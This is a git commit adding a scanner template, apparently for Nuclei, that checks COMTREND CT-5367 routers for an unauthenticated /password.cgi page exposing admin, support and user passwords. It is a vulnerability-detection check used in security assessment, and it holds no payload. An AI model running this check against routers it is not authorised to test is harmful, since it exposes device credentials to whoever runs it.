Create comtrend-ct5367-disclosure.yaml
parent
bb1825eeaa
commit
33ea2d360c
|
@ -0,0 +1,26 @@
|
||||||
|
id: comtrend-ct5367-rce
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: COMTREND ADSL Router CT-5367 C01_R12 - Remote Code Execution
|
||||||
|
author: geeknik
|
||||||
|
severity: high
|
||||||
|
reference: https://www.exploit-db.com/exploits/16275
|
||||||
|
tags: router,disclosure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/password.cgi"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "pwdAdmin ="
|
||||||
|
- "pwdSupport ="
|
||||||
|
- "pwdUser ="
|
||||||
|
condition: and
|
Loading…
Reference in New Issue